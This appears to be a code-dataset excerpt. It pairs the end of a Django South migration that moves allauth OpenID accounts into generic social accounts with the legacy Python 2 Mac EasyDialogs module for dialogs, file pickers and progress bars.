depends_on = (('socialaccount', '0002_genericmodels'),)
def forwards(self, orm):
for acc in orm.OpenIDAccount.objects.all():
sacc = acc.socialaccount_ptr
sacc.uid = acc.identity
sacc.provider = 'openid'
sacc.save()
def backwards(self, orm):
"Write your backwards methods here."
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'openid.openidaccount': {
'Meta': {'object_name': 'OpenIDAccount', '_ormbases': ['socialaccount.SocialAccount']},
'identity': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': '255'}),
'socialaccount_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['socialaccount.SocialAccount']", 'unique': 'True', 'primary_key': 'True'})
},
'openid.openidnonce': {
'Meta': {'object_name': 'OpenIDNonce'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'salt': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'server_url': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'timestamp': ('django.db.models.fields.IntegerField', [], {})
},
'openid.openidstore': {
'Meta': {'object_name': 'OpenIDStore'},
'assoc_type': ('django.db.models.fields.TextField', [], {}),
'handle': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issued': ('django.db.models.fields.IntegerField', [], {}),
'lifetime': ('django.db.models.fields.IntegerField', [], {}),
'secret': ('django.db.models.fields.TextField', [], {}),
'server_url': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'socialaccount.socialaccount': {
'Meta': {'object_name': 'SocialAccount'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'extra_data': ('allauth.socialaccount.fields.JSONField', [], {'default': "'{}'"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'uid': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'socialaccount.socialapp': {
'Meta': {'object_name': 'SocialApp'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"})
},
'socialaccount.socialtoken': {
'Meta': {'unique_together': "(('app', 'account'),)", 'object_name': 'SocialToken'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['socialaccount.SocialAccount']"}),
'app': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['socialaccount.SocialApp']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'token_secret': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'})
}
}
complete_apps = ['socialaccount', 'openid']
| bsd-3-clause |
pelya/commandergenius | project/jni/python/src/Lib/plat-mac/EasyDialogs.py | 32 | 30567 | """Easy to use dialogs.
Message(msg) -- display a message and an OK button.
AskString(prompt, default) -- ask for a string, display OK and Cancel buttons.
AskPassword(prompt, default) -- like AskString(), but shows text as bullets.
AskYesNoCancel(question, default) -- display a question and Yes, No and Cancel buttons.
GetArgv(optionlist, commandlist) -- fill a sys.argv-like list using a dialog
AskFileForOpen(...) -- Ask the user for an existing file
AskFileForSave(...) -- Ask the user for an output file
AskFolder(...) -- Ask the user to select a folder
bar = Progress(label, maxvalue) -- Display a progress bar
bar.set(value) -- Set value
bar.inc( *amount ) -- increment value by amount (default=1)
bar.label( *newlabel ) -- get or set text label.
More documentation in each function.
This module uses DLOG resources 260 and on.
Based upon STDWIN dialogs with the same names and functions.
"""
from warnings import warnpy3k
warnpy3k("In 3.x, the EasyDialogs module is removed.", stacklevel=2)
from Carbon.Dlg import GetNewDialog, SetDialogItemText, GetDialogItemText, ModalDialog
from Carbon import Qd
from Carbon import QuickDraw
from Carbon import Dialogs
from Carbon import Windows
from Carbon import Dlg,Win,Evt,Events # sdm7g
from Carbon import Ctl
from Carbon import Controls
from Carbon import Menu
from Carbon import AE
import Nav
import MacOS
import string
from Carbon.ControlAccessor import * # Also import Controls constants
import Carbon.File
import macresource
import os
import sys
__all__ = ['Message', 'AskString', 'AskPassword', 'AskYesNoCancel',
'GetArgv', 'AskFileForOpen', 'AskFileForSave', 'AskFolder',
'ProgressBar']
_initialized = 0
def _initialize():
global _initialized
if _initialized: return
macresource.need("DLOG", 260, "dialogs.rsrc", __name__)
def _interact():
"""Make sure the application is in the foreground"""
AE.AEInteractWithUser(50000000)
def cr2lf(text):
if '\r' in text:
text = string.join(string.split(text, '\r'), '\n')
return text
def lf2cr(text):
if '\n' in text:
text = string.join(string.split(text, '\n'), '\r')
if len(text) > 253:
text = text[:253] + '\311'
return text
def Message(msg, id=260, ok=None):
"""Display a MESSAGE string.
Return when the user clicks the OK button or presses Return.
The MESSAGE string can be at most 255 characters long.
"""
_initialize()
_interact()
d = GetNewDialog(id, -1)
if not d:
print "EasyDialogs: Can't get DLOG resource with id =", id, " (missing resource file?)"
return
h = d.GetDialogItemAsControl(2)
SetDialogItemText(h, lf2cr(msg))
if ok is not None:
h = d.GetDialogItemAsControl(1)
h.SetControlTitle(ok)
d.SetDialogDefaultItem(1)
d.AutoSizeDialog()
d.GetDialogWindow().ShowWindow()
while 1:
n = ModalDialog(None)
if n == 1:
return
def AskString(prompt, default = "", id=261, ok=None, cancel=None):
"""Display a PROMPT string and a text entry field with a DEFAULT string.
Return the contents of the text entry field when the user clicks the
OK button or presses Return.
Return None when the user clicks the Cancel button.
If omitted, DEFAULT is empty.
The PROMPT and DEFAULT strings, as well as the return value,
can be at most 255 characters long.
"""
_initialize()
_interact()
d = GetNewDialog(id, -1)
if not d:
print "EasyDialogs: Can't get DLOG resource with id =", id, " (missing resource file?)"
return
h = d.GetDialogItemAsControl(3)
SetDialogItemText(h, lf2cr(prompt))
h = d.GetDialogItemAsControl(4)
SetDialogItemText(h, lf2cr(default))
d.SelectDialogItemText(4, 0, 999)
# d.SetDialogItem(4, 0, 255)
if ok is not None:
h = d.GetDialogItemAsControl(1)
h.SetControlTitle(ok)
if cancel is not None:
h = d.GetDialogItemAsControl(2)
h.SetControlTitle(cancel)
d.SetDialogDefaultItem(1)
d.SetDialogCancelItem(2)
d.AutoSizeDialog()
d.GetDialogWindow().ShowWindow()
while 1:
n = ModalDialog(None)
if n == 1:
h = d.GetDialogItemAsControl(4)
return cr2lf(GetDialogItemText(h))
if n == 2: return None
def AskPassword(prompt, default='', id=264, ok=None, cancel=None):
"""Display a PROMPT string and a text entry field with a DEFAULT string.
The string is displayed as bullets only.
Return the contents of the text entry field when the user clicks the
OK button or presses Return.
Return None when the user clicks the Cancel button.
If omitted, DEFAULT is empty.
The PROMPT and DEFAULT strings, as well as the return value,
can be at most 255 characters long.
"""
_initialize()
_interact()
d = GetNewDialog(id, -1)
if not d:
print "EasyDialogs: Can't get DLOG resource with id =", id, " (missing resource file?)"
return
h = d.GetDialogItemAsControl(3)
SetDialogItemText(h, lf2cr(prompt))
pwd = d.GetDialogItemAsControl(4)
bullets = '\245'*len(default)
## SetControlData(pwd, kControlEditTextPart, kControlEditTextTextTag, bullets)
SetControlData(pwd, kControlEditTextPart, kControlEditTextPasswordTag, default)
d.SelectDialogItemText(4, 0, 999)
Ctl.SetKeyboardFocus(d.GetDialogWindow(), pwd, kControlEditTextPart)
if ok is not None:
h = d.GetDialogItemAsControl(1)
h.SetControlTitle(ok)
if cancel is not None:
h = d.GetDialogItemAsControl(2)
h.SetControlTitle(cancel)
d.SetDialogDefaultItem(Dialogs.ok)
d.SetDialogCancelItem(Dialogs.cancel)
d.AutoSizeDialog()
d.GetDialogWindow().ShowWindow()
while 1:
n = ModalDialog(None)
if n == 1:
h = d.GetDialogItemAsControl(4)
return cr2lf(GetControlData(pwd, kControlEditTextPart, kControlEditTextPasswordTag))
if n == 2: return None
def AskYesNoCancel(question, default = 0, yes=None, no=None, cancel=None, id=262):
"""Display a QUESTION string which can be answered with Yes or No.
Return 1 when the user clicks the Yes button.
Return 0 when the user clicks the No button.
Return -1 when the user clicks the Cancel button.
When the user presses Return, the DEFAULT value is returned.
If omitted, this is 0 (No).
The QUESTION string can be at most 255 characters.
"""
_initialize()
_interact()
d = GetNewDialog(id, -1)
if not d:
print "EasyDialogs: Can't get DLOG resource with id =", id, " (missing resource file?)"
return
# Button assignments:
# 1 = default (invisible)
# 2 = Yes
# 3 = No
# 4 = Cancel
# The question string is item 5
h = d.GetDialogItemAsControl(5)
SetDialogItemText(h, lf2cr(question))
if yes is not None:
if yes == '':
d.HideDialogItem(2)
else:
h = d.GetDialogItemAsControl(2)
h.SetControlTitle(yes)
if no is not None:
if no == '':
d.HideDialogItem(3)
else:
h = d.GetDialogItemAsControl(3)
h.SetControlTitle(no)
if cancel is not None:
if cancel == '':
d.HideDialogItem(4)
else:
h = d.GetDialogItemAsControl(4)
h.SetControlTitle(cancel)
d.SetDialogCancelItem(4)
if default == 1:
d.SetDialogDefaultItem(2)
elif default == 0:
d.SetDialogDefaultItem(3)
elif default == -1:
d.SetDialogDefaultItem(4)
d.AutoSizeDialog()
d.GetDialogWindow().ShowWindow()
while 1:
n = ModalDialog(None)
if n == 1: return default
if n == 2: return 1
if n == 3: return 0
if n == 4: return -1
screenbounds = Qd.GetQDGlobalsScreenBits().bounds
screenbounds = screenbounds[0]+4, screenbounds[1]+4, \
screenbounds[2]-4, screenbounds[3]-4
kControlProgressBarIndeterminateTag = 'inde' # from Controls.py
class ProgressBar:
def __init__(self, title="Working...", maxval=0, label="", id=263):
self.w = None
self.d = None
_initialize()
self.d = GetNewDialog(id, -1)
self.w = self.d.GetDialogWindow()
self.label(label)
self.title(title)
self.set(0, maxval)
self.d.AutoSizeDialog()
self.w.ShowWindow()
self.d.DrawDialog()
def __del__(self):
if self.w:
self.w.BringToFront()
self.w.HideWindow()
del self.w
del self.d
def title(self, newstr=""):
"""title(text) - Set title of progress window"""
self.w.BringToFront()
self.w.SetWTitle(newstr)
def label(self, *newstr):
"""label(text) - Set text in progress box"""
self.w.BringToFront()
if newstr:
self._label = lf2cr(newstr[0])
text_h = self.d.GetDialogItemAsControl(2)
SetDialogItemText(text_h, self._label)
def _update(self, value):
maxval = self.maxval
if maxval == 0: # an indeterminate bar
Ctl.IdleControls(self.w) # spin the barber pole
else: # a determinate bar
if maxval > 32767:
value = int(value/(maxval/32767.0))
maxval = 32767
maxval = int(maxval)
value = int(value)
progbar = self.d.GetDialogItemAsControl(3)
progbar.SetControlMaximum(maxval)
progbar.SetControlValue(value) # set the bar length
# Test for cancel button
ready, ev = Evt.WaitNextEvent( Events.mDownMask, 1 )
if ready :
what,msg,when,where,mod = ev
part = Win.FindWindow(where)[0]
if Dlg.IsDialogEvent(ev):
ds = Dlg.DialogSelect(ev)
if ds[0] and ds[1] == self.d and ds[-1] == 1:
self.w.HideWindow()
self.w = None
self.d = None
raise KeyboardInterrupt, ev
else:
if part == 4: # inDrag
self.w.DragWindow(where, screenbounds)
else:
MacOS.HandleEvent(ev)
def set(self, value, max=None):
"""set(value) - Set progress bar position"""
if max is not None:
self.maxval = max
bar = self.d.GetDialogItemAsControl(3)
if max <= 0: # indeterminate bar
bar.SetControlData(0,kControlProgressBarIndeterminateTag,'\x01')
else: # determinate bar
bar.SetControlData(0,kControlProgressBarIndeterminateTag,'\x00')
if value < 0:
value = 0
elif value > self.maxval:
value = self.maxval
self.curval = value
self._update(value)
def inc(self, n=1):
"""inc(amt) - Increment progress bar position"""
self.set(self.curval + n)
ARGV_ID=265
ARGV_ITEM_OK=1
ARGV_ITEM_CANCEL=2
ARGV_OPTION_GROUP=3
ARGV_OPTION_EXPLAIN=4
ARGV_OPTION_VALUE=5
ARGV_OPTION_ADD=6
ARGV_COMMAND_GROUP=7
ARGV_COMMAND_EXPLAIN=8
ARGV_COMMAND_ADD=9
ARGV_ADD_OLDFILE=10
ARGV_ADD_NEWFILE=11
ARGV_ADD_FOLDER=12
ARGV_CMDLINE_GROUP=13
ARGV_CMDLINE_DATA=14
##def _myModalDialog(d):
## while 1:
## ready, ev = Evt.WaitNextEvent(0xffff, -1)
## print 'DBG: WNE', ready, ev
## if ready :
## what,msg,when,where,mod = ev
## part, window = Win.FindWindow(where)
## if Dlg.IsDialogEvent(ev):
## didit, dlgdone, itemdone = Dlg.DialogSelect(ev)
## print 'DBG: DialogSelect', didit, dlgdone, itemdone, d
## if didit and dlgdone == d:
## return itemdone
## elif window == d.GetDialogWindow():
## d.GetDialogWindow().SelectWindow()
## if part == 4: # inDrag
## d.DragWindow(where, screenbounds)
## else:
## MacOS.HandleEvent(ev)
## else:
## MacOS.HandleEvent(ev)
##
def _setmenu(control, items):
mhandle = control.GetControlData_Handle(Controls.kControlMenuPart,
Controls.kControlPopupButtonMenuHandleTag)
menu = Menu.as_Menu(mhandle)
for item in items:
if type(item) == type(()):
label = item[0]
else:
label = item
if label[-1] == '=' or label[-1] == ':':
label = label[:-1]
menu.AppendMenu(label)
## mhandle, mid = menu.getpopupinfo()
## control.SetControlData_Handle(Controls.kControlMenuPart,
## Controls.kControlPopupButtonMenuHandleTag, mhandle)
control.SetControlMinimum(1)
control.SetControlMaximum(len(items)+1)
def _selectoption(d, optionlist, idx):
if idx < 0 or idx >= len(optionlist):
MacOS.SysBeep()
return
option = optionlist[idx]
if type(option) == type(()):
if len(option) == 4:
help = option[2]
elif len(option) > 1:
help = option[-1]
else:
help = ''
else:
help = ''
h = d.GetDialogItemAsControl(ARGV_OPTION_EXPLAIN)
if help and len(help) > 250:
help = help[:250] + '...'
Dlg.SetDialogItemText(h, help)
hasvalue = 0
if type(option) == type(()):
label = option[0]
else:
label = option
if label[-1] == '=' or label[-1] == ':':
hasvalue = 1
h = d.GetDialogItemAsControl(ARGV_OPTION_VALUE)
Dlg.SetDialogItemText(h, '')
if hasvalue:
d.ShowDialogItem(ARGV_OPTION_VALUE)
d.SelectDialogItemText(ARGV_OPTION_VALUE, 0, 0)
else:
d.HideDialogItem(ARGV_OPTION_VALUE)
def GetArgv(optionlist=None, commandlist=None, addoldfile=1, addnewfile=1, addfolder=1, id=ARGV_ID):
_initialize()
_interact()
d = GetNewDialog(id, -1)
if not d:
print "EasyDialogs: Can't get DLOG resource with id =", id, " (missing resource file?)"
return
# h = d.GetDialogItemAsControl(3)
# SetDialogItemText(h, lf2cr(prompt))
# h = d.GetDialogItemAsControl(4)
# SetDialogItemText(h, lf2cr(default))
# d.SelectDialogItemText(4, 0, 999)
# d.SetDialogItem(4, 0, 255)
if optionlist:
_setmenu(d.GetDialogItemAsControl(ARGV_OPTION_GROUP), optionlist)
_selectoption(d, optionlist, 0)
else:
d.GetDialogItemAsControl(ARGV_OPTION_GROUP).DeactivateControl()
if commandlist:
_setmenu(d.GetDialogItemAsControl(ARGV_COMMAND_GROUP), commandlist)
if type(commandlist[0]) == type(()) and len(commandlist[0]) > 1:
help = commandlist[0][-1]
h = d.GetDialogItemAsControl(ARGV_COMMAND_EXPLAIN)
Dlg.SetDialogItemText(h, help)
else:
d.GetDialogItemAsControl(ARGV_COMMAND_GROUP).DeactivateControl()
if not addoldfile:
d.GetDialogItemAsControl(ARGV_ADD_OLDFILE).DeactivateControl()
if not addnewfile:
d.GetDialogItemAsControl(ARGV_ADD_NEWFILE).DeactivateControl()
if not addfolder:
d.GetDialogItemAsControl(ARGV_ADD_FOLDER).DeactivateControl()
d.SetDialogDefaultItem(ARGV_ITEM_OK)
d.SetDialogCancelItem(ARGV_ITEM_CANCEL)
d.GetDialogWindow().ShowWindow()
d.DrawDialog()
if hasattr(MacOS, 'SchedParams'):
appsw = MacOS.SchedParams(1, 0)
try:
while 1:
stringstoadd = []
n = ModalDialog(None)
if n == ARGV_ITEM_OK:
break
elif n == ARGV_ITEM_CANCEL:
raise SystemExit
elif n == ARGV_OPTION_GROUP:
idx = d.GetDialogItemAsControl(ARGV_OPTION_GROUP).GetControlValue()-1
_selectoption(d, optionlist, idx)
elif n == ARGV_OPTION_VALUE:
pass
elif n == ARGV_OPTION_ADD:
idx = d.GetDialogItemAsControl(ARGV_OPTION_GROUP).GetControlValue()-1
if 0 <= idx < len(optionlist):
option = optionlist[idx]
if type(option) == type(()):
option = option[0]
if option[-1] == '=' or option[-1] == ':':
option = option[:-1]
h = d.GetDialogItemAsControl(ARGV_OPTION_VALUE)
value = Dlg.GetDialogItemText(h)
else:
value = ''
if len(option) == 1:
stringtoadd = '-' + option
else:
stringtoadd = '--' + option
stringstoadd = [stringtoadd]
if value:
stringstoadd.append(value)
else:
MacOS.SysBeep()
elif n == ARGV_COMMAND_GROUP:
idx = d.GetDialogItemAsControl(ARGV_COMMAND_GROUP).GetControlValue()-1
if 0 <= idx < len(commandlist) and type(commandlist[idx]) == type(()) and \
len(commandlist[idx]) > 1:
help = commandlist[idx][-1]
h = d.GetDialogItemAsControl(ARGV_COMMAND_EXPLAIN)
Dlg.SetDialogItemText(h, help)
elif n == ARGV_COMMAND_ADD:
idx = d.GetDialogItemAsControl(ARGV_COMMAND_GROUP).GetControlValue()-1
if 0 <= idx < len(commandlist):
command = commandlist[idx]
if type(command) == type(()):
command = command[0]
stringstoadd = [command]
else:
MacOS.SysBeep()
elif n == ARGV_ADD_OLDFILE:
pathname = AskFileForOpen()
if pathname:
stringstoadd = [pathname]
elif n == ARGV_ADD_NEWFILE:
pathname = AskFileForSave()
if pathname:
stringstoadd = [pathname]
elif n == ARGV_ADD_FOLDER:
pathname = AskFolder()
if pathname:
stringstoadd = [pathname]
elif n == ARGV_CMDLINE_DATA:
pass # Nothing to do
else:
raise RuntimeError, "Unknown dialog item %d"%n
for stringtoadd in stringstoadd:
if '"' in stringtoadd or "'" in stringtoadd or " " in stringtoadd:
stringtoadd = repr(stringtoadd)
h = d.GetDialogItemAsControl(ARGV_CMDLINE_DATA)
oldstr = GetDialogItemText(h)
if oldstr and oldstr[-1] != ' ':
oldstr = oldstr + ' '
oldstr = oldstr + stringtoadd
if oldstr[-1] != ' ':
oldstr = oldstr + ' '
SetDialogItemText(h, oldstr)
d.SelectDialogItemText(ARGV_CMDLINE_DATA, 0x7fff, 0x7fff)
h = d.GetDialogItemAsControl(ARGV_CMDLINE_DATA)
oldstr = GetDialogItemText(h)
tmplist = string.split(oldstr)
newlist = []
while tmplist:
item = tmplist[0]
del tmplist[0]
if item[0] == '"':
while item[-1] != '"':
if not tmplist:
raise RuntimeError, "Unterminated quoted argument"
item = item + ' ' + tmplist[0]
del tmplist[0]
item = item[1:-1]
if item[0] == "'":
while item[-1] != "'":
if not tmplist:
raise RuntimeError, "Unterminated quoted argument"
item = item + ' ' + tmplist[0]
del tmplist[0]
item = item[1:-1]
newlist.append(item)
return newlist
finally:
if hasattr(MacOS, 'SchedParams'):
MacOS.SchedParams(*appsw)
del d
def _process_Nav_args(dftflags, **args):
import Carbon.AppleEvents
import Carbon.AE
import Carbon.File
for k in args.keys():
if args[k] is None:
del args[k]
# Set some defaults, and modify some arguments
if not args.has_key('dialogOptionFlags'):
args['dialogOptionFlags'] = dftflags
if args.has_key('defaultLocation') and \
not isinstance(args['defaultLocation'], Carbon.AE.AEDesc):
defaultLocation = args['defaultLocation']
if isinstance(defaultLocation, Carbon.File.FSSpec):
args['defaultLocation'] = Carbon.AE.AECreateDesc(
Carbon.AppleEvents.typeFSS, defaultLocation.data)
else:
if not isinstance(defaultLocation, Carbon.File.FSRef):
defaultLocation = Carbon.File.FSRef(defaultLocation)
args['defaultLocation'] = Carbon.AE.AECreateDesc(
Carbon.AppleEvents.typeFSRef, defaultLocation.data)
if args.has_key('typeList') and not isinstance(args['typeList'], Carbon.Res.ResourceType):
typeList = args['typeList'][:]
# Workaround for OSX typeless files:
if 'TEXT' in typeList and not '\0\0\0\0' in typeList:
typeList = typeList + ('\0\0\0\0',)
data = 'Pyth' + struct.pack("hh", 0, len(typeList))
for type in typeList:
data = data+type
args['typeList'] = Carbon.Res.Handle(data)
tpwanted = str
if args.has_key('wanted'):
tpwanted = args['wanted']
del args['wanted']
return args, tpwanted
def _dummy_Nav_eventproc(msg, data):
pass
_default_Nav_eventproc = _dummy_Nav_eventproc
def SetDefaultEventProc(proc):
global _default_Nav_eventproc
rv = _default_Nav_eventproc
if proc is None:
proc = _dummy_Nav_eventproc
_default_Nav_eventproc = proc
return rv
def AskFileForOpen(
message=None,
typeList=None,
# From here on the order is not documented
version=None,
defaultLocation=None,
dialogOptionFlags=None,
location=None,
clientName=None,
windowTitle=None,
actionButtonLabel=None,
cancelButtonLabel=None,
preferenceKey=None,
popupExtension=None,
eventProc=_dummy_Nav_eventproc,
previewProc=None,
filterProc=None,
wanted=None,
multiple=None):
"""Display a dialog asking the user for a file to open.
wanted is the return type wanted: FSSpec, FSRef, unicode or string (default)
the other arguments can be looked up in Apple's Navigation Services documentation"""
default_flags = 0x56 # Or 0xe4?
args, tpwanted = _process_Nav_args(default_flags, version=version,
defaultLocation=defaultLocation, dialogOptionFlags=dialogOptionFlags,
location=location,clientName=clientName,windowTitle=windowTitle,
actionButtonLabel=actionButtonLabel,cancelButtonLabel=cancelButtonLabel,
message=message,preferenceKey=preferenceKey,
popupExtension=popupExtension,eventProc=eventProc,previewProc=previewProc,
filterProc=filterProc,typeList=typeList,wanted=wanted,multiple=multiple)
_interact()
try:
rr = Nav.NavChooseFile(args)
good = 1
except Nav.error, arg:
if arg[0] != -128: # userCancelledErr
raise Nav.error, arg
return None
if not rr.validRecord or not rr.selection:
return None
if issubclass(tpwanted, Carbon.File.FSRef):
return tpwanted(rr.selection_fsr[0])
if issubclass(tpwanted, Carbon.File.FSSpec):
return tpwanted(rr.selection[0])
if issubclass(tpwanted, str):
return tpwanted(rr.selection_fsr[0].as_pathname())
if issubclass(tpwanted, unicode):
return tpwanted(rr.selection_fsr[0].as_pathname(), 'utf8')
raise TypeError, "Unknown value for argument 'wanted': %s" % repr(tpwanted)
def AskFileForSave(
message=None,
savedFileName=None,
# From here on the order is not documented
version=None,
defaultLocation=None,
dialogOptionFlags=None,
location=None,
clientName=None,
windowTitle=None,
actionButtonLabel=None,
cancelButtonLabel=None,
preferenceKey=None,
popupExtension=None,
eventProc=_dummy_Nav_eventproc,
fileType=None,
fileCreator=None,
wanted=None,
multiple=None):
"""Display a dialog asking the user for a filename to save to.
wanted is the return type wanted: FSSpec, FSRef, unicode or string (default)
the other arguments can be looked up in Apple's Navigation Services documentation"""
default_flags = 0x07
args, tpwanted = _process_Nav_args(default_flags, version=version,
defaultLocation=defaultLocation, dialogOptionFlags=dialogOptionFlags,
location=location,clientName=clientName,windowTitle=windowTitle,
actionButtonLabel=actionButtonLabel,cancelButtonLabel=cancelButtonLabel,
savedFileName=savedFileName,message=message,preferenceKey=preferenceKey,
popupExtension=popupExtension,eventProc=eventProc,fileType=fileType,
fileCreator=fileCreator,wanted=wanted,multiple=multiple)
_interact()
try:
rr = Nav.NavPutFile(args)
good = 1
except Nav.error, arg:
if arg[0] != -128: # userCancelledErr
raise Nav.error, arg
return None
if not rr.validRecord or not rr.selection:
return None
if issubclass(tpwanted, Carbon.File.FSRef):
raise TypeError, "Cannot pass wanted=FSRef to AskFileForSave"
if issubclass(tpwanted, Carbon.File.FSSpec):
return tpwanted(rr.selection[0])
if issubclass(tpwanted, (str, unicode)):
if sys.platform == 'mac':
fullpath = rr.selection[0].as_pathname()
else:
# This is gross, and probably incorrect too
vrefnum, dirid, name = rr.selection[0].as_tuple()
pardir_fss = Carbon.File.FSSpec((vrefnum, dirid, ''))
pardir_fsr = Carbon.File.FSRef(pardir_fss)
pardir_path = pardir_fsr.FSRefMakePath() # This is utf-8
name_utf8 = unicode(name, 'macroman').encode('utf8')
fullpath = os.path.join(pardir_path, name_utf8)
if issubclass(tpwanted, unicode):
return unicode(fullpath, 'utf8')
return tpwanted(fullpath)
raise TypeError, "Unknown value for argument 'wanted': %s" % repr(tpwanted)
def AskFolder(
message=None,
# From here on the order is not documented
version=None,
defaultLocation=None,
dialogOptionFlags=None,
location=None,
clientName=None,
windowTitle=None,
actionButtonLabel=None,
cancelButtonLabel=None,
preferenceKey=None,
popupExtension=None,
eventProc=_dummy_Nav_eventproc,
filterProc=None,
wanted=None,
multiple=None):
"""Display a dialog asking the user for select a folder.
wanted is the return type wanted: FSSpec, FSRef, unicode or string (default)
the other arguments can be looked up in Apple's Navigation Services documentation"""
default_flags = 0x17
args, tpwanted = _process_Nav_args(default_flags, version=version,
defaultLocation=defaultLocation, dialogOptionFlags=dialogOptionFlags,
location=location,clientName=clientName,windowTitle=windowTitle,
actionButtonLabel=actionButtonLabel,cancelButtonLabel=cancelButtonLabel,
message=message,preferenceKey=preferenceKey,
popupExtension=popupExtension,eventProc=eventProc,filterProc=filterProc,
wanted=wanted,multiple=multiple)
_interact()
try:
rr = Nav.NavChooseFolder(args)
good = 1
except Nav.error, arg:
if arg[0] != -128: # userCancelledErr
raise Nav.error, arg
return None
if not rr.validRecord or not rr.selection:
return None
if issubclass(tpwanted, Carbon.File.FSRef):
return tpwanted(rr.selection_fsr[0])
if issubclass(tpwanted, Carbon.File.FSSpec):
return tpwanted(rr.selection[0])
if issubclass(tpwanted, str):
return tpwanted(rr.selection_fsr[0].as_pathname())
if issubclass(tpwanted, unicode):
return tpwanted(rr.selection_fsr[0].as_pathname(), 'utf8')
raise TypeError, "Unknown value for argument 'wanted': %s" % repr(tpwanted)
def test():
import time
Message("Testing EasyDialogs.")
optionlist = (('v', 'Verbose'), ('verbose', 'Verbose as long option'),
('flags=', 'Valued option'), ('f:', 'Short valued option'))
commandlist = (('start', 'Start something'), ('stop', 'Stop something'))
argv = GetArgv(optionlist=optionlist, commandlist=commandlist, addoldfile=0)
Message("Command line: %s"%' '.join(argv))
for i in range(len(argv)):
print 'arg[%d] = %r' % (i, argv[i])
ok = AskYesNoCancel("Do you want to proceed?")
ok = AskYesNoCancel("Do you want to identify?", yes="Identify", no="No")
if ok > 0:
s = AskString("Enter your first name", "Joe")
s2 = AskPassword("Okay %s, tell us your nickname"%s, s, cancel="None")
if not s2:
Message("%s has no secret nickname"%s)
else:
Message("Hello everybody!!\nThe secret nickname of %s is %s!!!"%(s, s2))
else:
s = 'Anonymous'
rv = AskFileForOpen(message="Gimme a file, %s"%s, wanted=Carbon.File.FSSpec)
Message("rv: %s"%rv)
rv = AskFileForSave(wanted=Carbon.File.FSRef, savedFileName="%s.txt"%s)
Message("rv.as_pathname: %s"%rv.as_pathname())
rv = AskFolder()
Message("Folder name: %s"%rv)
text = ( "Working Hard...", "Hardly Working..." ,
